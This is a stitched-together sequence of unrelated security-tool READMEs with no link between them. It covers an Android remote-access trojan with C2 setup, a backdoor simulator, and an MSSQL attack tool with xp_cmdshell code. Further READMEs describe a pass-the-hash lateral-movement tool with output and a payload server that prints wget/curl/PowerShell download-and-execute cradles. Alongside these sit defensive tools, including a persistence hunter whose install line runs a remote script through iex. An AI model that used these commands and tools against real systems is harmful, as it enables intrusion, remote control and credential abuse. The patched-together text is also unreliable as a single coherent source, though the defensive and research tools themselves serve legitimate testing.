Remote administration tool for Android.
- Clone the repository, move the server files to `/var/www/html/`, and install the dependencies:

```console
git clone https://github.com/Tomiwa-Ot/moukthar.git
mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web\ socket/
composer install
```

- The default credentials are username: `android` and password: `the rastafarian in you`
- Configure `c2-server/.env` and `web socket/.env`
- Create the database and tables using `database.sql`
- Start the web socket server:

```console
php Server/web\ socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
```

- Add the following directory configuration to `/etc/apache2/apache2.conf`:

```xml
<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>
```

- Set the C2 server and web socket URLs in `functionality/Utils.java`:

```java
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
```

- Compile the APK using Android Studio and deploy it to the target.
BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim, you will need to install it on both the server and client machines.
```shell
$ git clone https://github.com/HalilDeniz/BackDoorSim.git
$ cd BackDoorSim
$ pip install -r requirements.txt
```
After starting both the server and client, you can use the following commands in the server's command prompt:
- `upload [file_path]`: Upload a file to the client.
- `download [file_path]`: Download a file from the client.
- `screenshot`: Capture a screenshot from the client.
- `sysinfo`: Get system information from the client.
- `securityinfo`: Get security software status from the client.
- `camshot`: Capture an image from the client's webcam.
- `notify [title] [message]`: Send a notification to the client.
- `help`: Display the help menu.

BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
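To illustrate the general pattern behind these commands (a controller issuing instructions that the remote endpoint executes and answers), here is a minimal generic sketch in Python. This is not BackdoorSim's actual implementation; the port, framing, and command handling are assumptions for illustration only.

```python
import socket

# Generic sketch of the endpoint that receives and executes commands.
# BackdoorSim's real protocol, port, and command set may differ.
HOST, PORT = "0.0.0.0", 9999  # assumed listener address

def handle_command(cmd: str) -> bytes:
    if cmd == "sysinfo":
        import platform
        return platform.platform().encode()
    if cmd.startswith("download "):          # send a file back to the controller
        path = cmd.split(" ", 1)[1]
        with open(path, "rb") as f:
            return f.read()
    return b"unknown command"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.bind((HOST, PORT))
    srv.listen(1)
    conn, _ = srv.accept()
    with conn:
        while True:
            cmd = conn.recv(4096).decode(errors="ignore").strip()
            if not cmd or cmd == "exit":
                break
            conn.sendall(handle_command(cmd) or b"(empty)")
```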
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool. You can also read our article about backdoors.
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Make your changes and commit them.
4. Push your changes to your forked repository.
5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
Supported web frameworks (`route-detect` IDs in parentheses):

- Python: Django (`django`, `django-rest-framework`), Flask (`flask`), Sanic (`sanic`)
- PHP: Laravel (`laravel`), Symfony (`symfony`), CakePHP (`cakephp`)
- Ruby: Rails* (`rails`), Grape (`grape`)
- Java: JAX-RS (`jax-rs`), Spring (`spring`)
- Go: Gorilla (`gorilla`), Gin (`gin`), Chi (`chi`)
- JavaScript: Express (`express`), React (`react`), Angular (`angular`)

*Rails support is limited. Please see this issue for more information.
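To make the bug class concrete, here is a minimal Flask sketch of the pattern these rules surface: one route guarded by an authorization decorator and one left unguarded. The `admin_required` decorator is a hypothetical stand-in for whatever authn/authz mechanism your application actually uses.

```python
from functools import wraps
from flask import Flask, abort, session

app = Flask(__name__)
app.secret_key = "dev"  # required for session use in this sketch

def admin_required(view):  # hypothetical authz decorator
    @wraps(view)
    def wrapper(*args, **kwargs):
        if not session.get("is_admin"):
            abort(403)
        return view(*args, **kwargs)
    return wrapper

@app.route("/admin/users")
@admin_required             # guarded route: authz enforced
def list_users():
    return "user list"

@app.route("/admin/debug")  # unguarded route: the kind of finding
def debug_info():           # route-detect flags for review
    return "sensitive debug output"
```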
Use `pip` to install `route-detect`:
$ python -m pip install --upgrade route-detect
You can check that `route-detect` is installed correctly with the following command:
$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.
Findings:
/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly
1┆ print(1 == 1)
Ran 1 rule on 1 file: 1 finding.
`route-detect` provides the `routes` CLI command and uses `semgrep` to search for routes.

Use the `which` subcommand to point `semgrep` at the correct web application rules:
$ semgrep --config $(routes which django) path/to/django/code
Use the `viz` subcommand to visualize route information in your browser:
$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json
If you're not sure which framework to look for, you can use the special `all` ID to check everything:
$ semgrep --json --config $(routes which all) --output routes.json path/to/code
If you have custom authn or authz logic, you can copy `route-detect`'s rules:
$ cp $(routes which django) my-django.yml
Then you can modify the rule as necessary and run it like above:
$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json
`route-detect` uses `poetry` for dependency and configuration management.
Before proceeding, install project dependencies with the following command:
$ poetry install --with dev
Lint all project files with the following command:
$ poetry run pre-commit run --all-files
Run Python tests with the following command:
$ poetry run pytest --cov
Run Semgrep rule tests with the following command:
$ poetry run semgrep --test --config routes/rules/ tests/test_rules/
PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.
PySQLRecon can be installed with `pip3 install pysqlrecon` or by cloning this repository and running `pip3 install .`
All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV]
require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM]
can likely be run by normal users and do not require elevated privileges.
Support for impersonation (`[I]`) or execution on linked servers (`[L]`) is denoted at the end of the command description.
adsi [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enumerate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]
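For context on what commands like `enablexp` and `xpcmd` do under the hood, here is a rough sketch of the equivalent T-SQL sent over an ordinary client connection (pymssql is used here purely for illustration, and the host and credentials are placeholders; PySQLRecon's own transport and implementation may differ):

```python
import pymssql  # illustrative client library, not what PySQLRecon uses internally

# Placeholder connection details for illustration only.
conn = pymssql.connect(server="10.0.0.5", user="sa", password="Password1", autocommit=True)
cur = conn.cursor()

# Roughly what 'enablexp' boils down to: enable xp_cmdshell via sp_configure.
cur.execute("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;")
cur.execute("EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;")

# Roughly what 'xpcmd' boils down to: run an OS command and read its output rows.
cur.execute("EXEC xp_cmdshell 'whoami';")
for (line,) in cur.fetchall():
    if line:
        print(line)

conn.close()
```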
PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:
pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]
View global options:
pysqlrecon --help
View command specific options:
pysqlrecon [GLOBAL_OPTS] COMMAND --help
Change the database authenticated to, or used in certain PySQLRecon commands (`query`, `tables`, `columns`, `rows`), with the `--database` flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the `--link` flag.

Impersonate a user account while running a PySQLRecon command with the `--impersonate` flag.

`--link` and `--impersonate` are incompatible.
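The `--impersonate` and `--link` options map onto standard T-SQL constructs; here is a hedged sketch of what gets wrapped around a query (the login name `webapp` and linked server `SQL02` are placeholders):

```python
query = "SELECT SYSTEM_USER;"

# --impersonate: run the query in the security context of another login.
impersonated = f"EXECUTE AS LOGIN = 'webapp'; {query} REVERT;"

# --link: run the query on a linked server instead of the one you
# authenticated to (requires RPC Out; see the enablerpc/checkrpc commands).
linked = f"EXEC ('{query}') AT [SQL02];"

print(impersonated)
print(linked)
```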
pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:
git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help
PySQLRecon is easily extensible - see the template and instructions in `resources`.
Basically, NimExec is a fileless remote command execution tool that uses the Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later, via hand-crafted RPC packets instead of WinAPI calls. It sends these packets over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM authentication method over hand-crafted packets.

Since all required network packets are manually crafted and no operating system-specific functions are used, NimExec can be used on different operating systems thanks to Nim's cross-compilation support.

This project was inspired by Julio's SharpNoPSExec tool. You can think of NimExec as a cross-compilable version of SharpNoPSExec with built-in pass-the-hash support. I also learned the required network packet structures from Kevin Robertson's Invoke-SMBExec script.
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim
The above command uses a different garbage collector because the default one in Nim throws SIGSEGV errors during the service-search process.
Also, you can install the required Nim modules via Nimble with the following command:
nimble install ptr_math nimcrypto hostname
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
[NimExec ASCII-art banner]
@R0h1rr1m
[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!
It has been tested against Windows 10 & 11 and Windows Server 2016/2019/2022, from Ubuntu 20.04 and Windows 10 machines.
-v | --verbose Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.
Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!
Clone the repository:
git clone https://github.com/HalilDeniz/CryptoChat.git
Navigate to the project directory:
cd CryptoChat
Install the required dependencies:
pip install -r requirements.txt
$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.
$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Start the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]
Connect to the chat server.
options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY    The secret key for encryption. (Default=mysecretpassword)
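CryptChat's exact wire format isn't shown here, but the general idea of turning the shared `--key` into a symmetric cipher for each message can be sketched as follows. This is a generic illustration using Fernet from the `cryptography` package, not necessarily the scheme `serverE.py`/`clientE.py` implement.

```python
import base64
import hashlib
from cryptography.fernet import Fernet

def cipher_from_password(password: str) -> Fernet:
    # Derive a 32-byte urlsafe-base64 key from the shared secret.
    digest = hashlib.sha256(password.encode()).digest()
    return Fernet(base64.urlsafe_b64encode(digest))

f = cipher_from_password("mysecretpassword")   # the --key value
token = f.encrypt(b"hello over the wire")      # ciphertext that would be sent
print(f.decrypt(token))                        # what the peer recovers
```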
- `--help`: show this help message and exit
- `--host`: The IP address to bind the server.
- `--port`: The port number to bind the server.
- `--key`: The secret key for encryption.

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.
If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:
Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.
Designed to be used on exams like OSCP / PNPT, or CTFs like HTB.
Pull requests and issues welcome. As are any contributions.
Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate when the `--https` option is used; priority is also given to the `tun0` interface when the webserver is running, otherwise it will use `eth0`.
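Conceptually, the `--https` option amounts to wrapping a simple file server in TLS with the generated self-signed certificate. A minimal Python sketch of that idea is shown below; the certificate/key paths and port are assumptions, not qu1ckdr0p2's internals.

```python
import http.server
import ssl

# Assumes a self-signed pair already exists, e.g. generated with:
#   openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 30 -subj "/CN=serv"
handler = http.server.SimpleHTTPRequestHandler
httpd = http.server.HTTPServer(("0.0.0.0", 443), handler)  # binding 443 needs privileges

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)

print("Serving the current directory over HTTPS on port 443")
httpd.serve_forever()
```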
The common.ini defines the mapped aliases used within the `--search` and `-u` options.
When the webserver is running there are several download cradles printed to the screen to copy and paste.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
or
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self
The mapped alias numbers for the -u
option are dynamic so you don't have to remember specific numbers or ever type out a tool name.
$ serv serve --search ligolo
[*] Path: ~/.qu1ckdr0p2/windows/agent.exe
[*] Alias: ligolo_agent_win
[*] Use: 1
[*] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[*] Alias: ligolo_proxy_win
[*] Use: 2
[*] Path: ~/.qu1ckdr0p2/linux/agent
[*] Alias: ligolo_agent_linux
[*] Use: 3
[*] Path: ~/.qu1ckdr0p2/linux/proxy
[*] Alias: ligolo_proxy_linux
[*] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[*] Serving: ../../.qu1ckdr0p2/linux/agent
[*] Protocol: http
[*] IP address: 192.168.1.5
[*] Port: 80
[*] Interface: eth0
[*] CTRL+C to quit
[*] URL: http://192.168.1.5:80/agent
[*] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[*] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[*] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[*] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
[*] Web server running
MIT
DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.
git clone https://github.com/HalilDeniz/DNSWatch.git
pip install -r requirements.txt
python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
- `-i`, `--interface`: Specify the network interface (e.g., eth0).
- `-v`, `--verbose`: Use this flag for more verbose output.
- `-o`, `--output`: Specify the filename to save results.
- `-t`, `--target-ip`: Specify a specific target IP address to monitor.
- `-adt`, `--analyze-dns-types`: Analyze DNS types.
- `--doh`: Use DNS over HTTPS (DoH) for resolving DNS requests.
- `-fd`, `--target-domains`: Filter DNS requests by specified domains.
- `-d`, `--database`: Enable database storage for DNS requests.

Press `Ctrl+C` to stop the sniffing process.
python dnswatch.py -i eth0
python dnswatch.py -i eth0 -o dns_results.txt
python dnswatch.py -i eth0 -k 192.168.1.100
python dnswatch.py -i eth0 --analyze-dns-types
python dnswatch.py -i eth0 --doh
python3 dnswatch.py -i wlan0 --database
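Under the hood, this kind of DNS sniffing is typically built on a packet-capture library. Here is a minimal Scapy-based sketch of the core idea; it is a generic illustration (interface name assumed), not DNSWatch's actual code.

```python
from scapy.all import DNS, DNSQR, IP, sniff

def show_query(pkt):
    # qr == 0 marks a DNS query (as opposed to a response).
    if pkt.haslayer(IP) and pkt.haslayer(DNS) and pkt[DNS].qr == 0 and pkt.haslayer(DNSQR):
        print(f"{pkt[IP].src} asked for {pkt[DNSQR].qname.decode()}")

# Capture UDP/53 traffic on the chosen interface without storing packets in memory.
sniff(iface="eth0", filter="udp port 53", prn=show_query, store=0)
```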
DNSWatch is licensed under the MIT License. See the LICENSE file for details.
This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.
Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.
Or use this one-liner from an Administrative PowerShell terminal:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))
Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.
If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.
Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.
-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes
PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities
Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.
Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.
That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.
(Allow-listing is implemented for most of the checks but not all - still being actively implemented)
Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.
At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.
As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;
.\trawler.ps1 -drivetarget "F:\Test"
Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.
Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)
Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.
TODO
Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.
This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.
Columbus Project is an API-first subdomain discovery service: a blazingly fast subdomain enumeration service with advanced features.
Columbus returned 638 subdomains of tesla.com in 0.231 sec.
By default Columbus returns only the subdomains in a JSON string array:
curl 'https://columbus.elmasy.com/lookup/github.com'
But we think of the bash lovers, so if you don't want to mess with JSON and a newline-separated list is your wish, then include the `Accept: text/plain` header.
DOMAIN="github.com"
curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done
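The same lookup is easy to script in Python against the documented endpoint; with the default JSON response you get the subdomain list directly (the `requests` package is assumed to be installed):

```python
import requests

DOMAIN = "github.com"
resp = requests.get(f"https://columbus.elmasy.com/lookup/{DOMAIN}", timeout=10)
resp.raise_for_status()

for sub in resp.json():  # default response is a JSON string array
    print(f"{sub}.{DOMAIN}" if sub else DOMAIN)  # an empty entry means the apex domain
```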
For more, check the features or the API documentation.
Currently, entries are obtained from Certificate Transparency.
Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.
`-check`: Check the latest version on GitHub. Prints `up-to-date` and returns `0` if no update is required. Prints the latest tag (e.g.: `v0.9.1`) and returns `1` if a new release is available. In case of error, prints the error message and returns `2`.
git clone https://github.com/elmasy-com/columbus-server
make build
Create a new user:
adduser --system --no-create-home --disabled-login columbus-server
Create a new group:
addgroup --system columbus
Add the new user to the new group:
usermod -aG columbus columbus-server
Copy the binary to `/usr/bin/columbus-server`.
Make it executable:
chmod +x /usr/bin/columbus-server
Create a directory:
mkdir /etc/columbus
Copy the config file to `/etc/columbus/server.conf`.
Set the permission to 0600.
chmod -R 0600 /etc/columbus
Set the owner of the config file:
chown -R columbus-server:columbus /etc/columbus
Install the service file (e.g.: `/etc/systemd/system/columbus-server.service`).
cp columbus-server.service /etc/systemd/system/
Reload systemd:
systemctl daemon-reload
Start columbus:
systemctl start columbus-server
If you want Columbus to start automatically:
systemctl enable columbus-server
A pure python library for identifying the use of known or very weak cryptographic secrets across a variety of platforms. The project is designed to be both a repository of various "known secrets" (for example, ASP.NET machine keys found in examples in tutorials), and to provide a language-agnostic abstraction layer for identifying their use.
Knowing when a 'bad secret' was used is usually a matter of examining some cryptographic product in which the secret was used: for example, a cookie which is signed with a keyed hashing algorithm. Things can get complicated when you dive into the individual implementation oddities each platform provides, which this library aims to alleviate.
Check out our full blog post on the Black Lantern Security blog!
Inspired by Blacklist3r, with a desire to expand on the supported platforms and remove language and operating system dependencies.
Name | Description |
---|---|
ASPNET_Viewstate | Checks the viewstate/generator against a list of known machine keys. |
Telerik_HashKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Upload.ConfigurationHashKey |
Telerik_EncryptionKey | Checks patched (2017+) versions of Telerik UI for a known Telerik.Web.UI.DialogParametersEncryptionKey |
Flask_SignedCookies | Checks for weak Flask cookie signing password. Wrapper for flask-unsign |
Peoplesoft_PSToken | Can check a peoplesoft PS_TOKEN for a bad/weak signing password |
Django_SignedCookies | Checks django's session cookies (when in signed_cookie mode) for known django secret_key |
Rails_SecretKeyBase | Checks Ruby on Rails signed or encrypted session cookies (from multiple major releases) for known secret_key_base |
Generic_JWT | Checks JWTs for known HMAC secrets or RSA private keys |
Jsf_viewstate | Checks both Mojarra and MyFaces implementations of Java Server Faces (JSF) for use of known or weak secret keys |
Symfony_SignedURL | Checks symfony "_fragment" urls for known HMAC key. Operates on Full URL, including hash |
Express_SignedCookies | Checks express.js signed cookies and session cookies for known 'session secret' |
Laravel_SignedCookies | Checks 'laravel_session' cookies for known laravel 'APP_KEY' |
We have a PyPI package, so you can just do `pip install badsecrets` to make use of the library.

The absolute easiest way to use Badsecrets is by simply running `badsecrets` after doing a pip install:
pip install badsecrets
badsecrets eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
This is doing the same thing as the `cli.py` example shown below.

To use the examples, after doing the pip install just `git clone` the repo and `cd` into the `badsecrets` directory:
git clone https://github.com/blacklanternsecurity/badsecrets.git
cd badsecrets
The commands in the example section below assume you are in this directory.
If you are using the Badsecrets BBOT module, you don't need to do anything else - BBOT will install the package for you.
Bad secrets includes an example CLI for convenience when manually checking secrets. It also has a URL mode, which will connect to a target and attempt to carve for cryptographic products and check any it finds against all modules.
python ./badsecrets/examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
python ./badsecrets/examples/cli.py --url http://example.com/contains_bad_secret.html
You can also set a custom user-agent with --user-agent "user-agent string"
or a proxy with --proxy http://127.0.0.1
in this mode.
Example output:
$ python ./badsecrets/examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
badsecrets - example command line interface
***********************
Known Secret Found!
Detecting Module: Generic_JWT
Secret: 1234
Details: {'Issuer': 'Issuer', 'Username': 'BadSecrets', 'exp': 1593133483, 'iat': 1466903083, 'jwt_headers': {'alg': 'HS256'}}
***********************
Badsecrets includes a fully functional CLI example which replicates the functionality of blacklist3r in Python: `badsecrets/examples/blacklist3r.py`.
python ./badsecrets/examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
